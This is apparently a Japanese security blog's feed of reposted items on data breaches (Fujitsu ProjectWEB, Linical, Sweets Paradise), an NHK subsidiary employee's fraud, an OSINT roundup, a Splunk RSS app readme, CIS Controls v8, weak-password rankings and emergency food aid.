仕事で使うと装って旅行会社から新幹線のチケット約2,800万円分をだまし取り、現金化して私的に使ったとして、NHKの子会社NHKグローバルメディアサービスは2021年12月10日、40代の男性社員を懲戒解雇にし、発表した。

同社によると、社員は2021年7月~10月、取引先プロダクションの架空の出張名目で85件約2800万円分のチケットを旅行会社から受け取り、JRの窓口で払い戻して、自身のローンの返済などにあてていたという。代金は未払いで、グローバル社が弁済した。

2017年から今年7月までに同様の方法で購入、現金化したチケットは計約1億5千万円分にのぼり、代金は新たなチケットの払い戻しなどで支払ってきたといい、今回の未払い分も「いずれは返すつもりだった」と話しているという。

同社は告発などについて警察と相談しているといい「あるまじき行為であり、深くおわびいたします。再発防止に向けて全社的な取り組みを徹底してまいります」とのコメントを出した。

スイパラ通販利用者がクレカ不正利用被害に 運営元は「因果関係を調査中」(転載)

スイーツパラダイスの不正アクセス被害

スイパラ通販利用者がクレカ不正利用被害に 運営元は「因果関係を調査中」

「スイーツパラダイスの公式通販サイトを利用した後、クレジットカードが不正利用された」——そんな報告がTwitter上で相次いでいる。スイーツバイキングチェーン店「スイーツパラダイス」を運営する井上商事は報告を受け、2021年12月9日に公式通販サイトを一時閉鎖。取材に対し「事態は認識しており、原因がどこにあるのか確認中」としている。

Twitterでは9日午後8時ごろ、11月下旬に開催されたオンラインゲーム「原神」のコラボカフェイベントなどの際に同サイトでクレジットカード決済を行った人々から、上記のような報告が上がり始めた。海外のショッピングサイトやAppleなどの名義で身に覚えのない引き落としがあったという。



井上商事に問い合わせたところ「Twitterでの報告を見て気付き、被害が拡大しないよう公式通販サイトをメンテナンス中とした」と説明。「問題の原因が当社にあるのか、別のところにあるかを含めて現在調査中」としている。

日本の政府機関が富士通のツールを足掛かりにデータ漏洩の被害を受ける / Japanese government agencies suffer data breaches after Fujitsu hack(転載)~ソリトンの次は富士通かぁ~

Japanese government agencies suffer data breaches after Fujitsu hack

富士通の情報共有ツール「ProjectWEB」を介して、日本の複数の省庁が不正アクセスを受けました。

富士通の発表によると、ProjectWEBを利用したプロジェクトへの不正アクセスが行われ、一部の顧客情報が盗まれたとのことです。

なお、今回の不正アクセスが、脆弱性を狙ったものなのか、サプライチェーンを狙ったものなのかは明らかになっておらず、現在調査を進めています。

攻撃者は、少なくとも76,000件のメールアドレスにアクセス

昨日、国土交通省と内閣サイバーセキュリティセンター(NISC)は、富士通の情報共有ツールを介して攻撃者が内部情報を入手できたことを発表しました。

また、富士通は、攻撃者がProjectWEBを利用したプロジェクトに不正にアクセスし、独自のデータを盗み出したと発表しました。

富士通のProjectWEBは、企業や組織が、プロジェクトマネージャーやステークホルダーなどと、社内で情報を交換することを可能にします。

ProjectWEBログイン画面

ProjectWEBを経由して政府機関のシステムに不正にアクセスすることで、少なくとも76,000件のメールアドレスや、メールシステムの設定などの専有情報を取得することができたことが、国土交通省によって確認されています。

富士通の資料によると、2009年の時点で、このツールは約7,800のプロジェクトで広く使用されていたとのことです。

情報共有ツールの活用例を示す富士通ProjectWEBの概要  

なお、流出した電子メールアドレスには、専門家会議のメンバーなど外部の関係者のものも含まれており、個別に通知を受けています。

成田空港でも、航空管制データやフライトスケジュール、業務に関する情報が盗まれ、影響を受けました。

また、日本の外務省では、情報漏えいにより、一部の研修資料が流出しました。

内閣サイバーセキュリティセンター(NISC)は、富士通のツールを利用している政府機関や重要インフラ組織に対し、不正アクセスや情報漏えいの兆候がないか確認するよう、複数の注意喚起を行いました。

富士通、オンラインポータル「ProjectWEB」を一時停止

富士通は、この問題の範囲と原因を完全に調査している間、ProjectWEBポータルを停止しているとのことです。

ログインポータルへのURLにアクセスしようとするとタイムアウトしてしまいます。


ProjectWEBポータルは「soln.jp」ドメインでホストされていたため、自分の組織が影響を受けているか、あるいはかつて顧客であったかどうかを確認する一つの方法は、ネットワークログにこのドメインや前述のURLの痕跡を探すことです。

富士通は、プレスリリースの中で、関係当局に通知するとともに、顧客と協力して侵害の原因を特定すると述べています。

現在、富士通はこの事件を徹底的に調査しており、日本の当局と緊密に協議しています。富士通の広報担当者は、「予防措置として、このツールの使用を停止し、影響を受ける可能性のあるお客様にはその旨をお伝えしています」と述べています。

この攻撃の技術的な詳細については未定ですが、この事件は、何百もの顧客組織に影響を与えたファイル共有ツール「Accellion」のハッキング事件と似ています。

【参考】

ー12/14追記ー

ランサムウエアギャングLV-BLOGがwww.kobebussan.co.jpのデータをハッキングしたと主張


LV-BLOG https://darkfeed.io/2021/12/11/lv-blog-27/

LV-BLOG

https://darkfeed.io/2021/12/11/lv-blog-27/

株式会社神戸物産(こうべぶっさん、英: KOBE BUSSAN CO.,LTD.)は、兵庫県加古川市に本社を置く日本の企業。主に業務用食品の販売を手がけるフランチャイズチェーン (FC) 方式のチェーンストアである。1981年(昭和56年)創業。小売店舗は「業務スーパー」の名で全国展開しており、当名称は同社の商標となっている。本店については2021年(令和3年)4月3日より加古川市に移転。

なお、広島市に拠点を置く株式会社アクト中食(1911年〈明治44年〉創業)は、当社の「業務スーパー」と業態が同じ店舗「業務用食品スーパー」を瀬戸内地方で展開しているが、互いに無関係である。アクト中食は「業務用食材流通グループ (NCF)」に加盟する企業であり、その意味での「業務用食品」である。

週刊OSINT 2021-44号 / WEEK IN OSINT #2021-44(転載)


 今号もたくさんのテーマで素敵なアップデートが行われました。プライバシーからニュースサイトまで、そして盗まれた美術品からShodanの問い合わせまで。

  • ID-Art Mobile App
  • Craig Silverman Newsletter
  • 360Cities
  • Browser Privacy
  • Google Mobile Friendly Test
  • AllYouCanRead
  • Dark Web Queries for Shodan

ツール: ID-Art Mobile App

Sylvain Hajriさんから、インターポール(国際刑事警察機構)が提供する、盗まれた美術品を特定するための新しいアプリを教えていただきました。このアプリは、データベースにアクセスして、種類、名前、アーティスト、国別に検索することができます。作品の写真を比較した後、作品そのものを通報することもできます。もう一つの機能は、他のオブジェクトやサイトにタグを付けることで、例えば破壊行為に対してタグを付けることができます。ご興味のある方は、アプリの紹介ビデオをご覧いただくか、AndroidまたはiOSでダウンロードしてください。


小技: Craig Silverman Newsletter

クレイグ・シルバーマンがニュースレターを再開することになりました。第1号では、Facebookについての長文のパートがあります。次にosintmeのブログ記事があり、続いてAmazonがウェブストアで自社製品を競合他社よりも押し出していることが紹介されています。そして、最後の項目は再びFacebookについてで、詐欺師たちに素晴らしいプラットフォームを提供しているというものです。次号がどんな内容になるのか楽しみですが、すでに素晴らしいスタートを切っていますね。


サイト: 360Cities

Ritu Gillは絶好調で、自身のTwitterアカウントで素晴らしいリンクを共有し続けています。今回は、360°の画像や動画を集めたサイト「360cities」です。このサイトには、さまざまな視点、豊富なキュレーションセット、そしてギガピクセルギャラリーなどの優れた機能があります。ギガピクセル・ギャラリーといえば、こちらのサイトもお忘れなく。


小技: Browser Privacy

Ritu Gillがシェアしたもう一つのリンク、今回はブラウザのプライバシーについてです。Braveは、スタート画面の肥大化や暗号の自動入力問題など、ここ2、3年でニュースになった話題にもかかわらず、高い評価を得ています。また、Braveにはたくさんの設定項目があるという問題がありますが、これは非常にタイトなもので、真にプライベートなオプションとなりますし、オープンソースです。Chrome、Safari、Edgeなどの標準的なブラウザが苦手な方も、この概要を読めば、他のブラウザやあなたのプライバシーの取り扱いについて十分な情報が得られるでしょう。


小技: Google Mobile Friendly Test

TOCPの10分Tipsのひとつに、LinkedInのプロフィールを匿名で見る方法がありました。また、Googleのモバイルフレンドリーテストが少し見直されたようです。スクリーンショットやHTMLコードを見るには、まず、フレンドリー度の評価の下にあるview tested pageをクリックします。また、サーバーから送られてきたレスポンスヘッダーなど、技術的な情報も掲載されています。


サイト: AllYouCanRead

Nico 'Dutch OSINT Guy' Dekens氏は先日、「AllYouCanRead.com」というとてもクールなサイトを紹介してくれました。このサイトには、新聞、雑誌のほか、クラシファイド、ジョブ、ソーシャルネットワークなどのサイトへのリンクが多数掲載されています。外国で何か情報源を探す必要があるなら、絶対にここを利用すべきだと思います。この素晴らしいサイトに感謝します。


メディア: Dark Web Queries for Shodan

Sinwindieさんが、Shodanを使ってTorサーバーの匿名性を解除するための基本的なテクニックを紹介する動画をアップしました。このビデオでは、オニオンリンクの検索方法、ファビコンを使ったサーバーの検索方法、サーバーからのリクエストとレスポンスのヘッダーがどのようにマッチするかを特定する方法などを紹介しています。これらの基本的なテクニックは、Torサイトの所有者がサーバーを正しく設定していない場合に結果を出すことができ、実際のIPアドレスを見つけることができます。

SplunkをRSSリーダーに仕立てる。。。のメモ(転載)


github.com/LukeMurphey/sp…

================================================
概要
================================================

このアプリは、シンジケーションフィードをSplunkにインポートする仕組みを提供します(RSS、ATOM、RDF)。



================================================
Splunkの設定
================================================

以下の方法で、本アプリをSplunkにインストールします。

  1. Splunk Web にログインし、Splunk のユーザーインターフェースの左上にあるアプリのドロップダウンから「Apps " Manage Apps」に移動します。
  2. install app from file」ボタンをクリックします。
  3. Choose file" をクリックしてファイルをアップロードし、アプリを選択します。
  4. アップロード」ボタンをクリックします。
  5. Splunk の再起動を促すダイアログが表示されたら、Splunk を再起動します。

アプリをインストールしたら、新しい入力を設定することで、アプリを使用することができます。
  1. Splunk のユーザーインターフェースの上部にあるメニューから"Settings » Data Inputs"に移動します。
  2. "Syndication" をクリックします。
  3. "New"をクリックして、入力の新しいインスタンスを作成します。

================================================
サポートを受ける
================================================

サポートが必要な場合は、以下のサイトにアクセスしてください。


このアプリのソースコードや技術的な詳細は、以下のサイトでご覧いただけます。


CIS Controls v8日本語訳をリリース(転載)~ポイントは「リスク管理」から「情報管理」へ~

セキュリティ対策、どこまでやる?CIS Controls v8日本語訳をリリース

米国CIS(Center for Internet Security)が発行しているCIS Controls(シーアイエス コントロール)は、あらゆる規模の組織が活用できる、サイバーセキュリティ対策の具体的なガイドラインです。IT環境の変化や攻撃の高度化に伴い、クラウドコンピューティングやモビリティ、サプライチェーン、テレワーク環境などに対する、新しい攻撃手法への対応を加えたバージョン8が2021年5月18日にリリースされました。

このCIS Controls バージョン8の日本語版が米国CISのWebサイトからダウンロードできます。この記事では、CIS Controlsのコンセプトと活用方法についてご紹介します。

 CIS Controls Version 8(日本語版)のダウンロード

CIS Controlsとは何か

CIS Controlsは、米国のセキュリティ非営利団体であるCISが、企業がサイバーセキュリティ対策として取り組むべきことをまとめたガイドラインです。もともとは2008年にアメリカ国防総省(DoD)とアメリカ国家安全保障局(NSA)が外部脅威による情報漏洩を防ぐガイドラインとして策定を開始したのが始まりです。その後、SANS InstituteやCCSのもとで改訂を重ね、2015年からはCISが管理しています。

CISでは、CIS Controls以外にも様々なフレームワークやツールを提供しています。その中でもサイバーセキュリティ対策に取り組む企業が最初に参照すべきリソースがCIS Controlsです。CIS Controlsは、サイバー攻撃対策に焦点を当て、具体的に何をするべきかを、あらゆる規模の組織が利用できるように書かれています。現状の自社対策レベルを評価し、不足しているところや強化すべき箇所を整理できます。

具体的な実装のベストプラクティスについてはCISの他のドキュメントが参考になります。例えばCIS Benchmarks(ベンチマーク)はOSやミドルウエアの安全な設定に関するベストプラクティス集です。日々、CISとコミュニティがレビューを重ねているので対象となるソフトウエアも増加し、最新バージョンに適合するように更新されています。


CIS Controlsの構成と主なコンセプト

CIS Controlsには、「18のコントロール」と「153の具体的なセーフガード(保護手段)」が記載されています。ITの複雑化と攻撃手法の高度化に伴い、セキュリティソリューションも複雑化しています。CIS Controlsでは、あらゆる規模の組織が適切な優先順位でセキュリティ対策を実施できるよう、対象となる企業を3つのグループに分けています。

最初のグループ(IG1)は、IT資産や人員を保護するためのITおよび、サイバーセキュリティのリソースが限られている中小企業です。次のグループ(IG2)は、システムが取り扱うデータの機密性やサービスのクリティカル度はIG1に属する企業群より高くなり、自社内にITインフラの運用管理とITセキュリティを担当する部署を持つ大企業が該当します。最後のグループ(IG3)ではデータの機密性やサービスのクリティカル度は非常に高くなり、高度なセキュリティ専門部門が必要となります。IG3は公的サービスを提供する企業や業界規制遵守が求められる企業が該当します。

※ IG(Implementation Group):実装グループ


18のコントロールにある「153の具体的なセーフガード(保護手段)」には、IG1からIG3のそれぞれのグループにおいて、その対策が推奨かどうか示されています。企業はこのマトリクスを利用することで、自社のセキュリティ対策が必要な水準に達しているかどうか、現状の対策レベルをアセスメントできます。そして不十分なセキュリティ対策については、対応の優先順位を決めて計画立案できるようになります。


CIS Controlsから感じ取った3つのメッセージ

個々のコントロールと具体的なセーフガード(保護手段)については資料をご覧いただくとして、ここではCIS Controlsのメッセージを3つご紹介します。

平時のIT衛生管理(ハイジーン)の重要性

まず、最初に挙げるのはサイバーセキュリティ対策における「平時の衛生管理の重要性」です。サイバーセキュリティ対策において「平時の衛生管理」とは、「(PCなどの)アセットの把握と管理」、「(利用している)ソフトウエアの把握と管理」、「(保持している)データの把握と管理」、「(ソフトウエアやサービスの)安全な設定」、「アカウントの把握と管理」、「アクセス権の把握と管理」などです。このような当たり前の基本的なことをシッカリと着実に実施することが重要です。

先ほどの実装グループのうち、IG1は「基本的なサイバーハイジーン」であり、「すべての組織が適用すべきサイバー防御の基本的な保護手段のセット」と定義されています。「ハイジーン(Hygiene)」とは「衛生」という意味の英単語です。コロナ禍の感染予防策として「手洗い・うがい」、「マスク着用」、「ソーシャル・ディスタンス」などの平時の衛生管理をキチンと行うことの重要性を多くの方が認識したと思います。サイバーセキュリティ対策においても平時からの衛生管理が重要です。

CISの調査によると、IG1の対策を実装することで、マルウェア、ランサムウェア、Webアプリケーションハッキング、内部特権者の不正と過失、標的型攻撃などの主要なサイバーセキュリティリスクの70%以上を回避できるとされています。詳細については以下のレポートを参照ください。

CIS Introduces v2.0 of the CIS Community Defense Model

サイバーセキュリティ対策の自動化

次に挙げるのは、サイバーセキュリティ対策の「自動化」です。CIS Controlsでは各コントロールの「手順と対策」において、サイバーセキュリティ対策の実装と自動化を可能にするプロセスとテクノロジーについて説明が記載されています。

ここでCIS Controlsが意図している「自動化」はオートメーションというより、ツールなどを使うことで正確な情報を収集し、再現可能性を担保することを意識しているようです。先に記載した平時のIT衛生管理で必要な事(PC、ソフトウエア、アカウント、アクセス権の把握と管理)を着実に繰り返し実施していくためには何らかの自動化ツールが不可欠でしょう。

最新の話題と安定性のバランス

最後に挙げるのは「最新の話題と安定性のバランス」です。IT環境の複雑化と攻撃手法の高度化に伴い、セキュリティソリューションも複雑化してきています。CIS Controlsでは新しい防御技術に目を向ける一方で、あまりに複雑で新しすぎるソリューションについては「真新しいおもちゃ」として除外すると宣言しています。こうした「最新と安定のバランス」がCIS Controlsが支持される理由の1つではないかと考えます。

サイバーセキュリティ対策に関する最新の話題として、「ゼロトラストセキュリティ」に関心が集まっています。バージョン8では「ゼロトラスト」という明確な表現は出てきませんがクラウドの活用やリモートワークを意識した内容になっています。バージョン6(またはそれ以前)のCIS Controlsを使用している場合は、可能な限り早くバージョン8への移行計画を開始することが推奨されています。クラウド活用が進んでいる今こそ、スタンダードをバージョン8に切り替えるべきではないかと考えます。

ー2021/12/12追記ー

■CIS Controls v8で見直されたコンセプトの変更

①「リスク管理」ではなく「情報保護」

v7.1までは「Sub Controls」という表現が使われていたが、v8では「Safeguards」という表現に変わっている。Safeguardsとすることで、より情報を保護する意味合いが強調され、リスクをコントロールするための管理策のままでは、情報保護の実効性が得られないと考えたのではと推察できる。これまでは、管理策としてこういう活動が必要だという記載であったのを「どのように物事を管理していくのか」と踏み込んだ記述になっているのもガイドとしての価値が向上したと考えられる。

②管理策を統合し、抽象度を上げて保護策のカテゴリ数や項目数を減少

カテゴリ数は20から18に減少している。より重要なものが分かるように、また、使いやすいように見直された。

保護策の項目数も171→153に減少、要求事項が少なくなったというより、冗長な記述となっていた個所は統合されており、やや抽象的な表現となっている。例えば、v7.1の「特権IDのログイン失敗ログの検知」や「特権アカウントの追加の通知」という項目は、v8ではまとめて「詳細なログを集める」のような記載となっている。そのため、活用にあたっては、保護策の実施や適用状況の評価に際して自ら評価環境を理解するとともにリスクを特定する必要がある。抽象度が高い保護策は、組織内で行われるべき具体的な対策を自ら考え、その妥当性を評価することになる。この点は、これまでより正しく活用するための難易度を上げたとも考えられる。

③Basic ControlsからBasic Cyber Hygieneに

v7.1ではトップレベルの#1から#6をBasic Controls(基礎的対策)とし、基礎的対策を行うことがサイバー攻撃による侵害のリスクを85%低減されるとされていた。

v8ではBasic Cyber Hygiene(サイバーセキュリティ確保のための基本となる事前対策)として、18のカテゴリそれぞれに、どんな組織も必ず、先行して取り組むべきという推奨保護策が記述されている。53と限定的でより簡単に組織が具体的なセキュリティ対策のための活動に取り組みやすくなっている。

④ネットワークの内と外を区別しない

ゼロトラストアーキテクチャでも強調されていることではあるが、CIS Controls v8においても、インターネットと社内LANを区別する境界防御の表現はなくし、"Network Monitoring and Defense"に変更されている

⑤単なる自動化では不十分、保護策が連携され機能している状態が必要

CIS Controls v8では、2017年に米調査会社フォレスター・リサーチ社により再定義されたZero Trust extended(ZTX)の7つの項目のうち、「Automation and Orchestration(自動化と調和)」を発展させ、Align(連携)という概念が強調されている。CIS Controlsでは、ツールを使ってシステム的にリスク対応策を実装し、常時繰り返し可能、かつ、抜け漏れなくリアルタイムにサイバー攻撃から組織を保護することを推奨してきた。自動化と調和を強調した保護策連携について、最新の事例を挙げると、ネットワーク上のサンドボックスのアラート情報をAPI連携してエンドポイントの管理センターに送り、端末の状態を修復するところまでを自動対応できるように構築する等のテクニックがある。

2021年版 脆弱なパスワードランキング / Top 200 Most Common Password List 2021(転載)


日本人パスワードは「数字」「キーボード配列」「日本人名」に加えて「繰り返し語」

Top 200 Most Common Password List 2021

NordPass版の”最悪なパスワード2021”が公開されました。従来のグローバル統計に加えて、今年は国別データも開示されたので、日本人のよく使う”パスワード”について分析してみます。

今回はNordPassの調査データですが、例年ですと12月にSplashDataが”最悪なパスワード”として同様な調査データを公開していますが、正直な話、多少の違いはあれ、上位ランキングに掲載される脆弱なパスワードは大きくは変わらない事を確認する行事と化しています。

(おそらく今回の調査結果から登場した)日本のデータを見ていくと、過去のグローバル統計データには無い、日本人ならではと思える特徴が見えてきました。

NordPassのサイトでは、各国を選択し上位200位までのパスワードリストを見る事ができます。

グローバルデータと同じ様に、「数字」や「英語辞書単語」「キーボード配列」は多い印象です。

おそらく10年以上、こうした脆弱なパスワードは使ってはいけないと、こうした調査データを元に、ユーザーは何度もセキュリティ教育を受けてきたと思うのですが、結論から言えば、ユーザーは自身の脆弱なパスワードを「変える気が無い」事を証明し続けています。

その全てが無駄という訳ではありませんが、システム管理者(セキュリティ担当)は、ユーザーが「脆弱な状態を好む」という事をしっかりと頭に置き、過度にユーザーのセキュリティ意識(IDパスワード)に期待せずに、多要素認証など、多層防御に軸足を移す事が必要なのかと思います。

東証一部の医薬品メーカーに不正アクセス 株主の個人情報など延べ22万件が流出か(転載)


[PDF] 不正アクセスによる個⼈情報等流出の可能性に関するお知らせとお詫び 株式会社リニカル

東証一部の医薬品メーカーであるリニカルは2021年12月6日、複数拠点のサーバが不正アクセスを受け、個人株主や採用応募者などを含む、最大で延べ22万件の個人情報が流出した可能性があると発表した。犯行グループからデータに対する身代金を要求するメッセージが同社に届いたが、応じる予定はなく、今後も外部機関と連携し調査を続けて、全容解明や再発防止に努めるとしている。

同社の発表によると、2015年3月31日から21年6月30日の間、名簿上に記載があった個人株主の情報が約2万1000件、2009年3月31日から14年12月31日までの情報が約6万件(延べ件数)流出したとしている。

この他にも日本での採用応募者の個人情報が約1万4000件、取引先の社員の個人情報が約3万件、臨床試験の責任医師・分担医師の個人情報が約3万5000件、臨床試験のコーディネーター・協力者などの個人情報が約6万件などが流出した可能性があると説明している。

同社は、10月3日に日本本社と台湾拠点のサーバに、22日に欧州拠点で不正アクセスを受けたという。26日にはサーバ攻撃を行った犯行グループから身代金を要求する脅迫メッセージを確認。警察や調査会社と連携し、被害状況の確認を進める中、11月3日までに日本と台湾サーバから情報の窃取を示唆する痕跡を見つけたとしている。

その後も流出範囲の特定のため調査を続けたが、サーバ保存情報の暗号化やアクセスログの抹消を伴っていたため、物理的、技術的困難から調査は難航。二次被害を防ぐために、復元したサーバから流出した可能性のある情報の最大数を12月3日時点で見積もり、6日の発表に至ったと説明する。

同社によると、製薬会社などが委託した臨床試験の被験者データは、不正アクセスを受けたサーバとは別環境にあるため影響はなし。不正アクセスを受けた社内サーバも、起点となったVPN装置の脆弱性を修正し、多重認証を強化するなどセキュリティ対策を実施した上ですでに復旧済みであるという。

プレスリリースバックアップ

本当に食べるものに困ったときの最終手段~緊急一時食品提供~


本当に食べるものに困ったときの最終手段:

数多くの金策手段も使い果たしてどうにもならない状況もあります。

借金などの支払い関係はともかく生活費、特に食事代は絶対に確保しないと生きることもできません。

今回、そんな方のために、本当に食べ物に困ったときの最終手段の助け舟を共有させていただきます。

以前に”緊急小口資金”の貸付でも話題となった“社会福祉協議会”で食品を提供していただけるのです。

ですので、恥ずかしがらず出向き正直に“食べるものがありません”と窓口の担当に伝えてみましょう。

“緊急一時食品提供”があるのです。

これは、生活が困難な方や世帯に対しての食品提供で、趣旨に賛同してくれた企業や団体、市民から提供品を貰い食い繋ぐというもの。

当然、提供品ですので、そのときの状況により無い場合もあります。

しかし、運が良ければ、”お米”や“乾パン”、”レトルト食品”などを1週間分ほど受け取ることが可能。

金策することも勿論、大事ですが日々の食品も絶対に欲しいところ。

一度、お住いの“社会福祉協議会”に聞いてみてはいかがでしょうか。